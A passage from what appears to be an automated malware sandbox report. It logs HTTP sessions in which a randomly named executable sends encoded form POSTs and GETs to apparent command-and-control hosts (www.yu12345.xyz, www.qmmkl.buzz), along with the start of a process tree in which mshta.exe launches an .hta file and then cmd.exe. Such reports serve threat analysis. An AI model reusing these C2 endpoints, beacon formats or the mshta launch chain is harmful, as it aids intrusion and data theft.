                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:12 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 73 6f 6c 69 64 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 70 78 3b 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 66 [TRUNCATED]
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:41:12.966083050 CET1236INData Raw: 67 68 74 3a 20 33 30 70 78 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 20 23 33 35 33 35 33 35 3b 7d 0a 2e 6d 69 69 74 6d 20 2e 66
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
                                                                                                                                                        Dec 5, 2024 05:41:12.966094017 CET1236INData Raw: 3a 20 31 30 30 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
                                                                                                                                                        Dec 5, 2024 05:41:12.966105938 CET737INData Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 69 74 6d 22 3e 3c 6c 69 3e e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e5 9f 9f e5 90 8d e5 9c a8 e5 b9 b3 e5 8f b0 e4 b8 8a e6 9c aa e9 85 8d e7 bd ae e6 88 96 e8 80 85 e6 9c aa e7 94 9f e6 95 88 3c 2f 6c 69
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        37192.168.2.650025154.82.100.177803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:14.098176003 CET1843OUTPOST /mnl8/ HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.yu12345.xyz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.yu12345.xyz/mnl8/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 63 45 6d 77 4b 71 4c 38 41 6e 59 63 2f 38 73 56 55 51 72 43 6f 35 4e 30 42 33 44 32 67 6b 35 37 6d 72 6b 72 72 54 4a 72 32 54 52 56 56 39 53 74 57 50 59 69 4b 6b 43 48 74 2f 53 6b 31 70 54 66 6a 51 31 43 74 6f 59 4f 42 79 4d 44 50 38 55 6c 6e 53 39 35 64 50 32 6a 48 36 33 6e 48 4b 55 56 66 65 36 33 73 72 6c 65 65 75 53 4a 49 6b 36 37 35 68 53 36 72 6d 52 68 47 65 6d 31 79 72 37 65 31 71 33 51 56 63 67 63 33 42 42 7a 62 4b 64 4b 63 49 74 57 78 6e 70 59 38 49 7a 42 30 79 61 2f 45 74 36 41 78 54 4e 72 48 71 5a 34 52 66 78 72 39 41 5a 39 34 4d 63 49 6a 49 46 55 4a 66 6d 48 6f 38 37 41 42 44 44 44 50 44 59 69 38 68 45 37 41 54 69 78 59 78 77 33 65 35 64 2b 33 76 67 5a 41 6d 63 43 43 4c 70 57 48 63 6d 71 62 38 4c 54 45 4e 62 70 63 4f 58 47 4a 7a 43 39 56 6b 6b 4e 65 4a 42 63 42 2f 6b 32 4c 6e 4a 39 79 41 6e 4b 41 75 52 55 39 70 51 57 33 77 69 46 6a 31 5a 57 4a 2f 37 72 67 47 62 43 5a 59 38 55 48 73 51 4a 70 48 30 53 35 47 71 33 75 64 49 76 6f 50 64 6f 51 6e 38 70 4a 4e 37 35 67 58 66 78 46 44 [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=cEmwKqL8AnYc/8sVUQrCo5N0B3D2gk57mrkrrTJr2TRVV9StWPYiKkCHt/Sk1pTfjQ1CtoYOByMDP8UlnS95dP2jH63nHKUVfe63srleeuSJIk675hS6rmRhGem1yr7e1q3QVcgc3BBzbKdKcItWxnpY8IzB0ya/Et6AxTNrHqZ4Rfxr9AZ94McIjIFUJfmHo87ABDDDPDYi8hE7ATixYxw3e5d+3vgZAmcCCLpWHcmqb8LTENbpcOXGJzC9VkkNeJBcB/k2LnJ9yAnKAuRU9pQW3wiFj1ZWJ/7rgGbCZY8UHsQJpH0S5Gq3udIvoPdoQn8pJN75gXfxFDBeXDN0e9eqfAgAe4B/PS28Srt0mAM/bO7wDDGIOM9zAx5s4g9YVHZPeYQ3JxHJdBnXeL5IfvWSIwGjka4DryY/wLzjJH4nAV2+eJcE3sAuRmlJaaboueyG+tOshMDey7X/V85DusZdKkcGovQiavqcM7kyJCb+LLPqE1Dh76NyJrfBcQLZ47Mc08LXFdFjkqYAbuj427MGGb7taxOVHmi3NJ6eSE+tRGQsMxzmQCJ2Jo5q/lt4aBqZvH1XjcOGFxPdZLLwx7v1cMnu7IHV18ez9/viUvRLkK8E1j1Yc0J53k205sYD0ggxEefrWUfb59QrWrnZF+ccNyQnEfWdU1Hv40U/BIKBOVdWZl+PeJL5+v99ElA3j2DwpcfRzJ2Vo0V14w/uJT0tUZpKd+gskWPZObxpoxLP9y7MsTzFuEfNLMpPWwUHlw6ETUULmMD3Ik7hTETIXPCz2EHBeCFs5+CTa6dLWKPhpt9pAHqyxlRmr9Tm4LIwNQTzuTAUooOLzKrE47W/OJXpwQBeeHei18azy7IPpkS0x358Ozsf0O/wtMXbqov/O0m6UOqOxr5yWh4kGnYFrwjWTUxKz8F69NYjGbmCazl7pplEvtxQUplJmVYGnex9ciHg5ban0FoOPdBgLYj3WLn2lXK4XQHfR8vsBTo5L4tUlUQL [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        38192.168.2.650026154.82.100.177803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:16.758666039 CET547OUTGET /mnl8/?ZrE=RGOQJd/YEggQptEich3q6d0bfn/irFBnx+ZpwzxB5TUNCs3vZOAWTRyo0cim1/zDkhtz3OYESkByNsQcxwF9aubDKJHPAYECM7rOvY9yH/ydWUGi/0eSoW1GLP2ssLvhhZDeTZQ=&Jr=tnaxxtx HTTP/1.1
                                                                                                                                                        Host: www.yu12345.xyz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:41:18.279335976 CET1236INHTTP/1.1 410 Gone
                                                                                                                                                        Server: NgxFence
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:41:18 GMT
                                                                                                                                                        Content-Type: text/html
                                                                                                                                                        Content-Length: 4303
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 31 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 69 62 73 2e 6a 73 68 75 62 2e 63 6f 6d 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2d 31 32 2f 63 73 73 2f 73 6f 6c 69 64 2e 6d 69 6e 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 20 30 70 78 3b 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 66 [TRUNCATED]
                                                                                                                                                        Data Ascii: <html><head><title>410</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.css' rel='stylesheet'><link href='https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.css' rel='stylesheet'><style>body{margin: 0px;padding: 0px;font-family: Tahoma, Pingfang SC, Microsoft YaHei, SimSun;font-size: 12px;color: #353535;background-color: #efefef;}.brdiv {clear: both;width: 100%;height: 0px;line-height: 0px;padding: 0px;margin: 0px;border: none;background-color: transparent;background-image: none;}.mdiv{position: absolute;top: 50%;left: 50%;background-color: #fff;width: 800px;height: auto;transform: translate(-50%, -50%);box-shadow: 2px 5px 5px 2px #dfdfdf;padding-bottom: 20px;}.mtd{width: 100%; height: 10px; background-color: #376888;}.mid{margin: 0px auto; text-align: center; padding: 30px 0px; width: 750px; border-bottom: solid 1px #dfdfdf;}.miitm{width: 215px;float: left;font-size: 80px; [TRUNCATED]
                                                                                                                                                        Dec 5, 2024 05:41:18.279386997 CET1236INData Raw: 67 68 74 3a 20 33 30 70 78 3b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 20 23 33 35 33 35 33 35 3b 7d 0a 2e 6d 69 69 74 6d 20 2e 66
                                                                                                                                                        Data Ascii: ght: 30px;float: left;font-size: 15px;font-weight: bold;color: #353535;}.miitm .fa-check-circle,.miitm .fa-times-circle,.miitm .fa-question-circle{font-size: 20px;position: absolute;bottom: 0px;right: 60px;}.mil{ width: 60px;height: 80px;flo
                                                                                                                                                        Dec 5, 2024 05:41:18.279402018 CET1236INData Raw: 3a 20 31 30 30 25 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69
                                                                                                                                                        Data Ascii: : 100%; text-align:center; float: left;height: 25px;line-height: 25px;overflow: hidden;}a{text-decoration: none;}a:hover{text-decoration:underline;}a:visited{color: blue;}.reqid{font-family: monospace;font-weight: bold;}.mwm{z-index: -1;w
                                                                                                                                                        Dec 5, 2024 05:41:18.279472113 CET737INData Raw: 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 69 74 6d 22 3e 3c 6c 69 3e e6 82 a8 e8 ae bf e9 97 ae e7 9a 84 e5 9f 9f e5 90 8d e5 9c a8 e5 b9 b3 e5 8f b0 e4 b8 8a e6 9c aa e9 85 8d e7 bd ae e6 88 96 e8 80 85 e6 9c aa e7 94 9f e6 95 88 3c 2f 6c 69
                                                                                                                                                        Data Ascii: ><div class="oitm"><li></li></div><div class="brdiv"></div><div class="oitm"><li></li></div><div class="brdiv"></div></div><div class="omsg"><div


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        39192.168.2.650028199.115.230.222803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:23.831207037 CET803OUTPOST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 4e 72 59 66 70 79 6f 71 4c 59 72 6d 78 66 56 76 4c 53 63 76 30 6f 44 7a 4e 6b 6e 6d 4c 48 5a 78 69 56 56 65 4b 6d 63 4a 63 65 2b 47 4d 6e 45 51 71 4a 36 68 67 64 77 56 76 4a 35 32 30 45 6f 52 34 6e 48 63 6c 63 77 4b 48 4d 30 4c 4e 58 75 73 68 6a 43 6c 6e 2f 4b 5a 74 4d 52 34 43 32 43 6c 42 56 36 4a 74 67 6a 61 50 78 48 77 34 6f 78 73 64 62 7a 77 4a 30 78 62 41 41 49 32 33 71 7a 44 46 42 51 37 41 76 58 64 54 6e 51 6c 31 7a 39 71 31 68 4b 67 36 76 37 42 70 61 53 66 59 6b 52 56 6e 54 73 75 53 51 5a 6c 61 53 51 76 5a 75 63 37 52 6b 66 63 67 56 32 6d 61 64 57 41 62 62 50 78 2f 66 4f 46 6c 54 4e 39 6f 6e 47 33
                                                                                                                                                        Data Ascii: ZrE=NrYfpyoqLYrmxfVvLScv0oDzNknmLHZxiVVeKmcJce+GMnEQqJ6hgdwVvJ520EoR4nHclcwKHM0LNXushjCln/KZtMR4C2ClBV6JtgjaPxHw4oxsdbzwJ0xbAAI23qzDFBQ7AvXdTnQl1z9q1hKg6v7BpaSfYkRVnTsuSQZlaSQvZuc7RkfcgV2madWAbbPx/fOFlTN9onG3


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        40192.168.2.650029199.115.230.222803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:26.483891010 CET827OUTPOST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 4e 72 59 66 70 79 6f 71 4c 59 72 6d 77 2f 6c 76 4a 7a 63 76 6a 59 44 79 52 30 6e 6d 53 58 5a 31 69 56 52 65 4b 6e 4a 55 63 4d 4b 47 4d 43 34 51 34 34 36 68 75 39 77 56 6e 70 35 33 77 45 6f 47 34 6e 61 68 6c 5a 51 4b 48 4d 67 4c 4e 53 71 73 68 30 32 71 31 66 4b 62 30 38 52 36 4d 57 43 6c 42 56 36 4a 74 67 47 50 50 78 66 77 35 62 35 73 50 4f 48 7a 4b 30 78 61 42 41 49 32 6d 36 7a 48 46 42 52 75 41 75 62 33 54 6c 59 6c 31 79 74 71 79 30 6d 6a 74 2f 37 62 6b 36 54 31 57 57 59 5a 6d 77 5a 4e 61 41 31 6c 62 51 42 4c 52 34 64 68 4e 58 66 2f 79 46 57 6b 61 66 4f 79 62 37 50 62 39 66 32 46 33 45 42 61 6e 54 6a 55 74 51 34 78 49 38 69 51 43 4a 54 36 41 32 4e 6b 49 61 53 49 57 67 3d 3d
                                                                                                                                                        Data Ascii: ZrE=NrYfpyoqLYrmw/lvJzcvjYDyR0nmSXZ1iVReKnJUcMKGMC4Q446hu9wVnp53wEoG4nahlZQKHMgLNSqsh02q1fKb08R6MWClBV6JtgGPPxfw5b5sPOHzK0xaBAI2m6zHFBRuAub3TlYl1ytqy0mjt/7bk6T1WWYZmwZNaA1lbQBLR4dhNXf/yFWkafOyb7Pb9f2F3EBanTjUtQ4xI8iQCJT6A2NkIaSIWg==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        41192.168.2.650030199.115.230.222803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:29.146425962 CET1840OUTPOST /e3vj/ HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.qmmkl.buzz
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.qmmkl.buzz/e3vj/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 4e 72 59 66 70 79 6f 71 4c 59 72 6d 77 2f 6c 76 4a 7a 63 76 6a 59 44 79 52 30 6e 6d 53 58 5a 31 69 56 52 65 4b 6e 4a 55 63 4d 53 47 4d 77 41 51 71 76 75 68 74 39 77 56 6d 70 35 79 77 45 6f 48 34 6e 44 6d 6c 5a 4e 2f 48 50 59 4c 4c 41 69 73 30 77 71 71 73 76 4b 62 70 4d 52 35 43 32 44 2f 42 56 71 7a 74 67 57 50 50 78 66 77 35 63 4a 73 4d 62 7a 7a 47 55 78 62 41 41 49 69 33 71 7a 2f 46 42 59 56 41 75 66 4e 53 55 34 6c 31 53 64 71 77 43 79 6a 75 66 37 46 33 4b 54 74 57 57 46 62 6d 77 56 72 61 41 77 41 62 51 6c 4c 43 63 73 33 63 45 54 62 68 46 4b 65 48 2b 75 71 51 39 54 72 31 66 36 4a 7a 57 46 48 76 6e 69 2b 6b 46 4a 76 63 75 72 6d 4b 6f 6a 61 41 44 45 36 4c 75 50 6a 49 74 51 30 6b 36 58 63 6a 6c 6a 62 53 73 56 6f 54 62 6d 72 58 64 4b 71 41 74 73 6a 59 62 33 70 39 6e 71 6d 56 33 46 4c 44 76 38 36 56 45 4a 45 4a 79 30 77 2b 34 61 66 2f 62 32 4a 2f 5a 4f 68 59 59 51 54 51 78 72 57 6c 68 57 56 30 33 62 6d 58 75 2f 53 58 49 6f 77 59 44 61 56 72 6d 6e 6d 4a 48 73 67 52 36 78 63 73 56 49 62 32 4e [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=NrYfpyoqLYrmw/lvJzcvjYDyR0nmSXZ1iVReKnJUcMSGMwAQqvuht9wVmp5ywEoH4nDmlZN/HPYLLAis0wqqsvKbpMR5C2D/BVqztgWPPxfw5cJsMbzzGUxbAAIi3qz/FBYVAufNSU4l1SdqwCyjuf7F3KTtWWFbmwVraAwAbQlLCcs3cETbhFKeH+uqQ9Tr1f6JzWFHvni+kFJvcurmKojaADE6LuPjItQ0k6XcjljbSsVoTbmrXdKqAtsjYb3p9nqmV3FLDv86VEJEJy0w+4af/b2J/ZOhYYQTQxrWlhWV03bmXu/SXIowYDaVrmnmJHsgR6xcsVIb2NcTxuwUipjrGuJObvpC7WFcWjZNwPqQwxzCEwGbLLd1rdSIXIWgzHyj3f9+L0FgJ29JE7ezNAScxOBRqxHZnBn8C4RsVRkJTkFEluZR7V6aj/zPRfW2Zy3crnk86UqpLzK4rueygYSb8fF2N+zyLja22QteEkxtAbbFT6fxdv24EN/LerN+2h/j5ukkd8VXiZx4h7aqrquft0jQC+gOmLDfxZIJzGyZfegzg1CtKLIdp4qqWlLk/ySs+sTibqb5qkvfBPVP2K++QqVgAY6A4zmycelopKCiB4+gzocmQWCYoMdh6mzAOc5xLpkILSkDJwbdSeAmRawLHXs3htvCGD0+oRBsAzwvkE5CvaUirhWDkhTCQHnP3o3SM1P7KlJQbDHg4rzJAdF3SPWW8urnPIZxJx+/IgOlcBZ31a5YQ2HQAJvpJAFR1I/mqoQFZXRsN+rpqkslUNm/LywDz2RlQ/kX4F4DYYS8Z3AbROm5ydK1fq+KeGkzxnUtDJH61TnyRkqulTzDlYOM8d2BZ8aSnenm0ET0Blq4FgXqxqdqDmfIy3r7cEjjBQx0pP1WRMqLHYYt2NulR/BDKSyhyFWOABEssUpCKIRj9+Ei/sXRsnbhCbqcIPyxeI74vsA/QWUeqAJfM/s+8E5uR+xTRNCUq/yOxv88ke1D/w8b [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        42192.168.2.650031199.115.230.222803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:41:31.793647051 CET546OUTGET /e3vj/?Jr=tnaxxtx&ZrE=Apw/qEhkM9PBzv16DC8g1MSIQhvVD2Vj01FPVXV4CfqJVQ1J3uaJteAUq9BD3RYf6FzZ09NLBogJcHSO0hmFge+YoOQSOFa9DG3d+S6Zcyz3+NwsM7PgNDQLFA8HvIbfdwoJPYw= HTTP/1.1
                                                                                                                                                        Host: www.qmmkl.buzz
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36


                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:mshta.exe "C:\Users\user\Desktop\maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta"
                                                                                                                                                        Imagebase:0x330000
                                                                                                                                                        File size:13'312 bytes
                                                                                                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:23:37:52
                                                                                                                                                        Start date:04/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        Wow64 process (32bit):true
